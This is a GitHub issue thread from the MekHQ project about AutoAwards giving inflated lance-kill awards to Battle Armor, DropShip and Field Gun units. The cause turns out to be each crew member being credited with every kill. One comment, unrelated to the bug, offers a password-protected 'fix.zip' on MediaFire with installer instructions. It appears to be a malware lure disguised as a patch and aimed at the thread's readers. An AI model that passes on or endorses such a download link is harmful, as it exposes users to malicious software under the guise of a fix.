### ISSUE TITLE
[0.50.0-SNAPSHOT] AutoAwards - BA unit getting credit for lance kills they did not earn

### ISSUE THREAD

**Issue by Tzahr** [MegaMek/mekhq#4725]
### Environment
15:18:07,079 INFO  [mekhq.MekHQ] {main}
mekhq.MekHQ.initializeLogging(MekHQ.java:315) - Starting MekHQ v0.50.0-SNAPSHOT
    Build Date: 2024-08-25T01:25:18.350793281
    Today: 2024-08-27
    Origin Project: MekHQ
    Java Vendor: Eclipse Adoptium
    Java Version: 21.0.3
    Platform: Windows 11 10.0 (amd64)
    System Locale: en_GB
    Total memory available to MekHQ: 8 GB
    MM Code Revision: 38c5c63334f27ef2c0e2cf39b9b634883a948f14
    MML Code Revision: b1b0bee27fee84bfe1af4375aba9a5423258cea7
    MHQ Code Revision: d9a07a3c8f79c902c2c188a1590b53ee786de3bd

### Description
Finished a contract, let AutoAward run. A Battle Armor unit is still getting lance kill credits beyond what their platoon / lowest unit container achieved. It appears to be counting other formation kills to their total. 

I have provided a save at the end of contract. The TOE can be double-checked there, but it should be structured correctly. 
The BA unit earned some kills, but not enough to qualify for a rewrad. When the contract is finished and AutoAwards runs, you will notice that many BA pilots will qualify for 36 Lance kills. 

### Files
[1st Rimward Hussars_PreContractEnd.zip](https://github.com/user-attachments/files/16764895/1st.Rimward.Hussars_PreContractEnd.zip)
[customs.zip](https://github.com/user-attachments/files/16764963/customs.zip)

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by IllianiCBT** [comment]
I believe this is fixed by: #4727

Can you load [this](https://github.com/MegaMek/mekhq/actions/runs/10583217803) Action, advance one day, conclude the contract and then confirm whether everything is working as it should. It _looks_ fine to me, but you'll know your guys and the contract just completed a lot better than I.

**Comment by Tzahr** [comment]
I've realised what's happening. The system is actually functioning as intended, in that it is counting every kill. 

The issue is multi-crew units and kill credit.
Because multi-crew units are composed of multiple personnel, they _each_ get credited with the kill. So if a six-man squad of Battle Armor kills a single enemy Mech... the unit has six kills, not one. Because each member of the squad will get kill credit.

It's why this is affecting Battle Armor and Dropships - i.e. units with large crews. If my Overlord, with 11 crew, gets four kills, AutoAward will credit it with a total of 44 kills. Four kills for every one of its eleven crew. 

So it is assigning lance kills correctly - it's just multiplying the kills.

**Comment by repligator** [comment]
I've been running a Field Gun only MHQ campaign, and Tzahrs conclusion matches what I've seen. My entire company got maybe 3 kills the entire mission, but they were showered in kill awards on the conclusion, because some of the Field Guns have 20+ soldiers in them.

**Comment by IllianiCBT** [comment]
Yeah, we have a solution in mind, but it won't be in 50.0

**Comment by IllianiCBT** [comment]
Tentatively closing as resolved
